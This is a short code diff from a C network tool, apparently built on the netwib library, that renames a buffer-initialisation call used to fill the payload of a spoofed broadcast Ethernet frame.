@@ -71,7 +71,7 @@ netwib_err t000075_core(int argc, char *argv[])
   netwib_er(netwib_io_init_spoof_link(&device, &pio));
 
   /* main loop */
-  netwib_er(netwib_buf_init_ext_text("Eabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz", &data));
+  netwib_er(netwib_buf_init_ext_string("Eabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz", &data));
   netwib_er(netwib_buf_init_mallocdefault(&pkt));
   linkheader.type = NETWIB_DEVICE_DLTTYPE_ETHER;
   netwib_er(netwib_eth_init_fields(0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
